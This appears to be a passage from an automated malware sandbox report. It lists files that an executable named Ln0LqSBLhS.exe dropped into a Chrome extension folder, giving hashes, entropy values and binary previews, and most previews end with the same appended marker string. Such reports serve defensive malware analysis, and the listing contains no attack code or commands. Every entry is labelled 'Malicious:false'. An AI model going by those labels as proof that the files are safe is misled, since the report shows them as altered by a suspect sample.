                                                                                                                                                                                                    Entropy (8bit):7.6019071977797825
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Zp+OHgIWY2S+yGAWd2Vx+PCmugxfvTrbG9mIpsydyXcii9a:PnHhWY2S+Zx3PCmugNv/KEApdyXbD
                                                                                                                                                                                                    MD5:436781DB56D502369769E7597A3FC3A7
                                                                                                                                                                                                    SHA1:99D5735F7965616FE50F1F4EC42010EF67BBBF1C
                                                                                                                                                                                                    SHA-256:CBC98DD399A89D211445DA713D66999EC2675C341A5CC441A437999DC53F3757
                                                                                                                                                                                                    SHA-512:7BE03233257BEBB9003409553ED59504C50070E79F9AA1945DDCE26674AD98475CB00AB972386465F98C6B7A55CE2E943BCBCBAA8BCDBF642E151B81226179EB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....7..8.|.T.......,..,4.ApA2~..iK.a....Y{]>..}.Z)...U...%....<w...k.2>...B.........<.Lh<!..+b~.....g.t.#..I.^.......nQ.S..%h....NE9.m}.Yc.%..w.:..q.h..:...2...C..uU.^..}5.. ...;,..!T....I1.!..B..M.m..CG...7.........z..-...o..z|.(...Z..x.w&....s.....^ge...v.......l....T.....z7*mn..$....P...e....5..E..=A.V.....I.....m.;7.Fd.....O.......j.t[V6*(S\....B.jK.k\.w{+._1.....V2.~..[R.J._W.C...H..,..M.......9w.S[B....u...C..|..>@........g.J.....`........_.f.xR....$......%....n5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\de\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):585
                                                                                                                                                                                                    Entropy (8bit):7.560002881546748
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Wnnx45ml8GneMZ+Fij66hf770bzwP9oZGAecii9a:1cveM9DAb0VAebD
                                                                                                                                                                                                    MD5:13197FC2ECB95E1BB989541064B985AD
                                                                                                                                                                                                    SHA1:686621F29D2DB5EB6BE7E7A9A71C4E8513B7BFFA
                                                                                                                                                                                                    SHA-256:223F3918C98F5E6DE2B0F1270EBF914A94D77B19B92741CD33AA059E1240EDC6
                                                                                                                                                                                                    SHA-512:4B044875859C6949C03DAFDA63C4485E14E1937A1E6FA2D67E90587FE60976DFA90329D657E5C0BBB0B0BE3CF0457F0A16F97E68EFF5139B81377930A5ED5FB7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .v=...].ID./.C.....6.T[h....p.YD..a.\M.v.......c_.UqV@......3r;:.k..^...L.=.Y.}.d.wIA.....u&{..^...!.6...1h.O.+I`..XD%....<...8L.8s.x$.s;...u#..FeSZ.`.ky#m.........<..............r.s.7n.[:.)x.F..n....l..<}.-.L.?..;T..$._...-.P.W.%U..,..<\V.....*..e{o.>.#)G..-...W.....%.]."X=C..B{F.n.}9...QTP#......\._3X...WbO-.@.w......>I..d7AM.<....DtK~.....R.......Y._@....s...5.....]-...)........B..2...j.......9h...m).......)=..o4c.h<H..xk.)~&.B7=..6c.a.q.E..M..h...(G..N.G.F...'...@...o.kQ7..,R.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\el\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):658
                                                                                                                                                                                                    Entropy (8bit):7.668321354467259
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:f9vxjw6x3nTHgHysd9JyzB8yp5ok/YkxTEqZ6Zsokcii9a:1llyHysjw7fo09xTE2EsokbD
                                                                                                                                                                                                    MD5:7729A175CB9D226F3C80545ACE817D31
                                                                                                                                                                                                    SHA1:91C90801D21787F7C319B5543BFAEF1FC299614D
                                                                                                                                                                                                    SHA-256:95DC4F5FD2E8A13811E3E01949D8E185CC368160BB588BD5C93CD39E470831D0
                                                                                                                                                                                                    SHA-512:442B44E0A3AA360D81A696BCF7094D1D4A9733773F9862AD50323FFB70241F568415DFEC9DBBEB64836993FFDFBBA88F106BBAF8C7FB66A4448728DBCD3A5F96
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...E!.c.S.:....L.1.=b.!8....e.{".3l.Y..]..l..5.QwD.4..p...f...#.C.....A.-....Q....QrY|m.)=..|..J.f6..{&d.k......a.a...A.Rm.a........Ru.svyb#j-}.ov...w......d.*.L....'a......X......lj.l2O...i...5u.}....i..r....Zb@..b._..~.P&....7.....m..Hf.Px..D.H.,..Ks7...&.YP,)...T.5>...H.B.l..(..&%..%..y...g}'D.b....4.7T.)...a..C $...$@...pX..vs.........I.J..'.}....g.......8...........u..9~....[.......d........T..3.ED....".?3..e.g,I.....ZW0....l.d=.q..$.w.h..i........# .Rb..?>.jaq....w.\...:a.?.).Fl...Iu.N...........g.k..0..........U.j'.u=Z./....k.k4F.R.GW5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\en_GB\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):578
                                                                                                                                                                                                    Entropy (8bit):7.556259210640437
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:NxvkIFbtqyW6XU6m8Y3clOegavavqyZ5a23j//dxWj13lAcii9a:NpE6XU69ZavtE2z/LWj13lAbD
                                                                                                                                                                                                    MD5:D2A270082C86D80B9F8282C0F4479510
                                                                                                                                                                                                    SHA1:D6E337C495155EF7D5166E3BEF440675798982B1
                                                                                                                                                                                                    SHA-256:FAF14BED54D7318E4E9315323CA9B796C203DB297A2CC895A08B3EB1F4036292
                                                                                                                                                                                                    SHA-512:E6CAB1FC4A58D43FDF1E74B618248022B15DDAF8DA460ABEC293BD0236CC69D88793F600ABEB59A822587043646A36F7EF008FADC88E9A08005B0EC29594D388
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ~..=.u......{..m....J6M..V@wW.....Pw....xu<6....+.t.y{.p.FAt..n....v.$..$./F9>;p.J..I.....V......*.....Mv-.(.....q.L.......A....).?.8M94...\.b.7s9v=...).5..^o=....rS..:.Y.q..M..;..6....NCU.l...6..2B.-K....J'9...l..5a4W...qK.......C.....u,...../.$.x!.?....R..(.,..u...o.BXh......@...m.+o....Qs....J.k`D...#....0i.Y<.a$4]dt.d.T7s.L....z.:rrj....x..K...HS.>k>H=.o......#..}....*....b_P.Z....+.Z.ow...#....*%W...$...ZP!.bz..z..O<...V..M..DO....(.;l..O.:..0.%..Q.v8E..{..a..M.f.........7s5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\en_US\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):578
                                                                                                                                                                                                    Entropy (8bit):7.564346858162878
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:yeTKaWOl8E0+1VBTonLFw9gR9nM9RhWWYLClXV6Xcii9a:yeTKaP8E0e6LFwmRyVwCEbD
                                                                                                                                                                                                    MD5:55BE8365923454AC434EE7204F1CFB64
                                                                                                                                                                                                    SHA1:70836B329E13481A878B2FFEDBCE830BD250285B
                                                                                                                                                                                                    SHA-256:E897DBA20158C6D4988C321C1D266259F42231DC70820C7A5E546A0F04B682DA
                                                                                                                                                                                                    SHA-512:138C6801CEB019A82CBF3A4A9B3260E48A91B158BFEF52148357485B18DD2C3FC84AE19FD28D783ED1DE5251DB872CA34CA13DE48CFC938A670CCFC79B52EB4F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: "~.^C...V..M9.@o.\..x1.....M.qd'.W..&R.I...m.9(.d...*.....;.j..4..t.f.....eN)p.7(....G......=..btv/`ij......dyT..:....k.V_.#..9.B ]&....N?e.m(.........l...2...{..7.u....y...'tj=.w.=."}.R.'..&j.Q}~...zu...."n...l_..h.^6...:5B......{..M././."."..X.|.lIX.\.A.Y.....MiDXu{..S.pr..?.pB....l:.N...*..........bgJ.n.....A..l..4^#~W... .p./..s...1....:../#];..|.~..2..g_.|H.5.j........e.....H../..Y........Fb*%COW~/..y?a...q..=.Ru.s.|`mP.b.@..O`Aph......&.D.<.>.......-.A.q_rw....z.......'xl5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\es\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):588
                                                                                                                                                                                                    Entropy (8bit):7.572762988087199
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:MKHKCatzldGy/GFKEesspaO29IAoVZEVniShXy7So7ziscii9a:MRG3essA9872XUXzisbD
                                                                                                                                                                                                    MD5:52590AC50CDDAFB3C0F12378F1DB0157
                                                                                                                                                                                                    SHA1:56119C39D3499085D607F82E231D7E46E443413D
                                                                                                                                                                                                    SHA-256:020FD5DD3F913F97FC460C8FE61B6C89001D3165962A36F67A0A5DB63A84A9FB
                                                                                                                                                                                                    SHA-512:1414D84F4E519CF0E6EC2F9E18D3DC50D0C8BDD1949AB4C28F7C3FE111A01ACE7055C626EA29FE07338B5A1EB6B763844EEF3B294C14F8E80A90D2C8407786C8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: -...~......."1...5...c,...WE..I....o......+B.6...../....._nl@..dj...T.F?\.3p......X.N....+.`..o..C..+..d....7...;we..D.>.r.$..u...9......+.c....~2...<?..V.W.NJ...7...A.HGO..R..S..4.VB....'.p......HX..#.......=>....~.5...<....+..$.[.G.E......q.-.cq.......|Y...S#.....?2.EiN..pa... q.....fr`.@.<.:....8*.8,..ol..0[....Et....[+c..V.0..R....V...m.{C..r..D.a..!3 .bu.3~.....:..k_.Q...r=....2m.._"c..M.+~&.....M..k....&.=6..j..Q.x.....k.x....s.g.d.J..W.G.R>=M...r.....]^X......G.D.o.A45VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\es_419\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):588
                                                                                                                                                                                                    Entropy (8bit):7.601656503847482
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:gqte7LfSufS97bqTHgiM/IxF7Qokypnkkt8ucii9a:Bte7DSu69PqTHDM/9YkepbD
                                                                                                                                                                                                    MD5:3A4573B96369ACDF201E5ADFE96197F0
                                                                                                                                                                                                    SHA1:3DDAE4167173D1BB0C88AFBA88D640A42B304D51
                                                                                                                                                                                                    SHA-256:CD9D50D86B8FAE7B723AB481A1D3F8BDCE8019DAE0418823E28F298308693005
                                                                                                                                                                                                    SHA-512:6402213C2BF4E0CD79C53ABA513AECA738E84F0EF35C3FC08C03DED6DFD005A4E1B36E33CA8D4B07F508E325EECEA252A58FF8999C9437ADC86D682100366F82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: F..O..r{y.....A.u..O..r.u./.*...{.9=.q............}..&#,...x}*=B..T..8:%..G..d!..&...|oce..B"{.a.Y.8Z....V..K7..Q..S..`mb`.BW.......7.9/.l.....`..LF.{,~`......Ss.)...*tI.Z.4hFM.Q..=.....I^.U .....x.s[LT...66..[.w...W.E.......O..V...#.e.....S..5.e......ys......x".%.r.=6.PA..T..q.(...Oms.......c..0...YG...*.C{.....=H.yc....n...0.l...D.)kHh~;.....QK......6I.n.J....../.p..... .=.g. .0...'}<...c.:B..<..)<`..27....3^.....h..>?..L..0.Z.......Z..R..*..nf......@..vK.a.....XASTZ..a....&.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\et\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):580
                                                                                                                                                                                                    Entropy (8bit):7.5949724674424886
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:UaN1I7s61UcLSiZsBmdJYGb31oEMxTqX/bVinNOpDwOuM12aMvstHwcii9a:UyGseUvxBMbFVvxlnT/tQbD
                                                                                                                                                                                                    MD5:728F52D837D93E316BC9D22F168101EE
                                                                                                                                                                                                    SHA1:1DD46C028588B436B95E67E6A553983DBA3E6918
                                                                                                                                                                                                    SHA-256:BA71F981057D002F37757CC8662441AB80A2D31DF86DA8F8F960213F71AAE305
                                                                                                                                                                                                    SHA-512:C98D8FACF3054012F011F3105A9A0CC7C103815C770E532DEFD1A4097F00DD4CCC5A6259DCFA1585A730277D44CB75C040CAC74B586D880B8A46794BA8474CD9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ;'.6h..S]R..L...A....V?9..D.Q....i..toQ1..^..._lo...p5..j/..t3)............RM....h...g...6G.(P.f.T.e.jA.l..r.Q$.w..|>....7(!NU.km....d..N..m.Ew...g.Y......B.r......Cn.E*/..c.=....d.......U^a..%p.....G@.....y..=...F^_....sOQ:.M......L@ U..>p7.T....1.se.#.F[,:...?.H..............0-qi..>m..GA..j!........*........r.]B%>...p...*W.I.sCmO..........&.*....i.$tZ.:F...n...y..hTH...`%.....WF>...o ..y[l}..%[h....g..T.."._.Y.q...V.].x...{E....Z..........7.M....7..J..6O!.l.U<..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\eu\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):572
                                                                                                                                                                                                    Entropy (8bit):7.612414744274644
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:I9+aQBs451LMw3QsVxqDDeCjRCdng+JKxQXrDXwcii9a:+d+LMw3zLC9WtkQAbD
                                                                                                                                                                                                    MD5:9A1A91A5ACC55B4D7517DEB6A89C4636
                                                                                                                                                                                                    SHA1:7D60146D403AE791F32466C26D159C3A12F8D4AE
                                                                                                                                                                                                    SHA-256:6DB9B375898EDF680411201FF9CE4BB6266CA72B894A8C52FBFEBE23BAE93753
                                                                                                                                                                                                    SHA-512:C44D1F0E068B68304DCCBC6D28D44501958FB7541DEDA318256F049342265A1F9B3036C9FDD750C46A2F8BBDBA143CDB7755C5A7F97975D259FF48901B172994
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: mu..........\E.....(4.S.%.`0.P..@.YY......Ht.._.*+...O$.6PR.H7.....'.l................Z.$9Z?{..V..m[...).....f.%m.L>.S.K.3c#Z.8........0T.U.6.^O....n...A.N.bWQd.....}.T.........Ra..[..3..h....C.:(R....s..^..u..._.B.X&......Q6H...0^\.c|.6...(....Z.CR....R.$.y.E..........a........L.J.PL..o.g......Z...+............./.N..$..C..o.=qR.#B.."....*...1.k....K...Px..D'.,06.......~.',jt.%D.....GI....*4...:.9..n...}j......\J...].8.g..@..`[.h....L.y..`T..J.It..+.........M.v5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fi\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):586
                                                                                                                                                                                                    Entropy (8bit):7.58701159112419
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:SdQNRTASJpvQ5WmE6Ho/5s18hCUwdQ0lXcii9a:6xSJK5WmhRV9bD
                                                                                                                                                                                                    MD5:B0C377FE805F00ADAC1E76F3382453C9
                                                                                                                                                                                                    SHA1:9F9028B4E103790933D0E82F59E94FEEFCDD77CD
                                                                                                                                                                                                    SHA-256:8BED59858FE50DCCF54DCF2A078DD13DB960E5D67935D83EB97708EB5215D0C2
                                                                                                                                                                                                    SHA-512:341BDD4FC96ADE682ACC2BE98D6A9CC6F99534B26DEEE3EF81EDB8D34E6BD5DF2DD4D36AF93821D0711529196427995F040527BC957055A8FFA03EF95F6FB8B6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..Ac".=L"...a........w.....MSHh...X.*`....g=./.{Fa...r..EM3.7~.gJ.dy..=;g.`....~9.Z#...m..<.3&.x.j...X.C...^.{.A;.Xt.M/..W..a..d{.K.......j.F......7#..`.K..cf....FjbU...V....(...{.0373,.x..7...V'..L.6..t..........EN.[.6...Hu...cX$X[......6....a .:3.P..1rb....?.G...w.=..:......g(...nF.x.mb.s+.>.B]._L..Zj.h..>....Y`.$.b~../kDKmo.1|.z.`..>rNL.oZ ..T.UR.@+d..z.w...g.....u .n.F...Fq......)..z|;SKqpX.b..-..M.Ykp.....G{.."......vWJ....vv......s,.<..>IoI?K......[..>.{.....bT...}.5.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fil\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):589
                                                                                                                                                                                                    Entropy (8bit):7.594781185928657
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:3+ZVYaHJd7bYFtdVEuUXh2cIQhY2jux+/zcii9a:3+Tf7bYFxEuUx2Fl2jux+/zbD
                                                                                                                                                                                                    MD5:905DB5A8162ECBF680658E1E4D1BD415
                                                                                                                                                                                                    SHA1:2E3473FFEBEB050A2AA1DD81E645DE603598DC3D
                                                                                                                                                                                                    SHA-256:FE850982E6B7DB6D6B8C7A05AEDFACA0D3A58BE9AB4978FE92AD016D088D828A
                                                                                                                                                                                                    SHA-512:BB965594A969E4898407D1944CEDD68CF75EADF841E50531172B07201F079B57F7312BFCC565FB1DE1322144EE0079E8A58AEEBDB1B02D2F407A291DADF051B1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .4E..n.V=c......=4......V....".r...i.....RL.xGg}.R...\C....K...*[_........\....Z_..px^......Q....B-..y)#xs.*b2o^......14.z..^..l.rL# D.H..NV.).FC..|...CU.\X.u..%...C.y%....|&..I<J...v.....`....#......P.......W,..D.a...s..7.........q...l...=................f.L.....8..T....Gv....A.=I.l..$....,...1...E.j..H.qd...>....6G.%.<..A.i......G..#.........s0......bD.QH.Ldr.z....8&e.....:|w.)..w# ..a.=.F.*.j2..\. .R......K4m.Q.R.$.c....O...-.....1.q/Y..F!8.h^.%.E...r..c"G.u......!.N5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fr\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):581
                                                                                                                                                                                                    Entropy (8bit):7.622152588387035
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:2EXZRKHPfGgM91U6iQwVMBWaW4vyYBEw+3dMPWW/sYp/xj0a/6vSmPmXcii9a:21U9+JQgMAaW8BEn3m73p/F0WiwbD
                                                                                                                                                                                                    MD5:373F69DF5ADFB01212FF4913AC93C3EE
                                                                                                                                                                                                    SHA1:2E08E054340EAE53B6C56A4E4B2F3E8CFB10E2EA
                                                                                                                                                                                                    SHA-256:60B3252CAAA3DFD2DEF426B03E66C9BA1F2589E24FFEB43FEC8385597B359561
                                                                                                                                                                                                    SHA-512:FE02A0B231692C29F1B2B392CCB28221B6CFE4CA23C07A93367B0F5B11EDD9B5ACC140BB9D97F20E47A8783B47269C5BBFB97D2C7065C2B6ADD2C123DAD8662E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ........;...<..w.+{$.C.H{.F..nw+........~.c.#./...IfL.d.....;........B..{.;..i....9.~.....:&.!...d T .K....;...R.^......?|L.T.L.l8\.z...Bp`}.w....... .>.Y.m..<S~q1..>.d7....a#\.r05.t...;gE/:.,&.%.l..Q*.O..Xp......../.".Z.>.f.....V.....GZw...n.>EU ^.Nb@..^..~...e.3.....lRcY...x......0]7H...MO....d9...)..9.`[.m..........q.'.\.4.!...D....?l.$.B.RD...L.....z.^rC.'...o+=K../7....J.............y$y...U......>.ZY`.JI....Y+4...9va.\o,..B.s.....Gk.E.*..?.....9..Cj.Dc.J..b=.Z.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\he\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):273
                                                                                                                                                                                                    Entropy (8bit):7.22763602185492
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:k8AhISBgfeBi/FFUYkVlX0RqEl5WpVVPuu9h9MDHEFVxiX5KNw:k8RdPSVWRqEypV9uu9imRi
                                                                                                                                                                                                    MD5:406056CFBD2A347800A12D66653F672F
                                                                                                                                                                                                    SHA1:3839BF642A498282C48DE537E30AD83FCB779771
                                                                                                                                                                                                    SHA-256:88005971E1FD5451D20559C9C2C1D932F7D48F2A0E4312793DEE74093A6A87DB
                                                                                                                                                                                                    SHA-512:5FEA2C7AC3838E367C15135D68B6B6C511337D62A1B751E498E162F4EED0E23CF56FBF627A10624B2DBE250F1C82604AAD02B312982A6DFA58E8B3A44F876CED
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .l...........].h..`.;c......tQ....N~.......Z.\.p..h``..(.@C...].=...@.....j}..|...f....#.q..g......85.vj.gAs...qj.V..Mm..2.]azk......J_.n.th..-..o..g..wr._.*......k....C4........}^K.G..X...X,wM.0. "6.<O...06.Tlz.ej.&.....l.......\.......}/../m9yU..[.....h.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_metadata\verified_contents.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7170
                                                                                                                                                                                                    Entropy (8bit):7.9746538129995255
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:twH3uICkgnz+A7z1lJ2HFIcSOFr2tq54mtf:CH3uqsaA7z1uHFICrQql9
                                                                                                                                                                                                    MD5:E5AC06054F01FCBCB31FF15352462E72
                                                                                                                                                                                                    SHA1:0BFA8B4BD4CA53F0FBBCBB2808BBD5C118AF2123
                                                                                                                                                                                                    SHA-256:9AC4FAEFC0CAF9442E39FE319DA972A5198618817554F2E1A052C79F2D931AC0
                                                                                                                                                                                                    SHA-512:A46455211664A036F3DD5CC5DB1280A5F8EF542A9739ACABD4F0F23C2BD79132D04BEC8B95A32BD1B09277AD846285DC3780D9A09FDF0DDBFB8D30470C07E8B7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..`..k./.O*'}...Pn.........u...f=...6..8...'...5.d..l.....4.<...J%...........+9R.S.;..3k...Xur.......!..Bj..C...#.CM....f..3..l2.v..l:.XO..8.s. .@.Tt.v......*&.I...".p.~}..(.d..lu7_.}?!..'.6.."?S(9....0...k ...\..q.....3-jQ...'...&.p...`.46T...9...i...d...S.wE`......|M..ou..A..lH..w.wk....`.t.1..r.O..!0..8.l.z...?..xg.3.B.rD.=...>.U.~.0..z3..\.Q..8.}..j].+i.....2....,.3...".....[v...KV....k.T:....!.....+.\uB~.L..".m*......A...H....$.......[..]=..}.'.nK..1.C..j7"oM;.:.!w6F...ci)N>9......7.lzz.......s...\.yWJ..1.,;4..k...Ks.=.lzH...4.9....6..........._.YQ.*b..Z.A...&.>S.G...NN^i..U.9.]^...q.d.@..}.0.P..7.n..b..b.v..)eB.0iZ....f9.L.....<..i.....E..8....V. ....m.m.`j...3.a.d-.e..fg[%8..s...1,.5<.U.[@._?'m...K... .0....+.S.(...)6.......;y....]:..tv.......K....|....@.O.....]..E.........?.5.xP..g..h.Q......#*.5..!5.t......O.3...&p==.R..o.\..Du.{BV.5.>.6V....LX.MD.#rB.....,4.U....J....G.$d._.Q.....e...D...@.r.'.I....#t+..r.G 0...e?.)#@%
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\manifest.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1299
                                                                                                                                                                                                    Entropy (8bit):7.837408915236634
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:rXoyMsgK5lGlpNr006F2UsJDAz7T/u8ZAOFdMN51k6mW5AunUfibD:rXoyMwLFOwn/lFG1tmkCwD
                                                                                                                                                                                                    MD5:17DBECF89A74B7435521433C927C6208
                                                                                                                                                                                                    SHA1:E4FA241F85FE74C70CFE0B1FE0EA207E383ABD42
                                                                                                                                                                                                    SHA-256:F160C6F15EEF752CBDD2DF1AEAC981D7C3201EE42733094AE3B06FE2EC8E4F5B
                                                                                                                                                                                                    SHA-512:0947ADCC42D0511AABBC1EF2AEA0A0156A0398982C3855CC0246C893F72FEBED8C595A402C503975972722D926401FE0F8C3612D7065DF3702BD4706DE678399
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
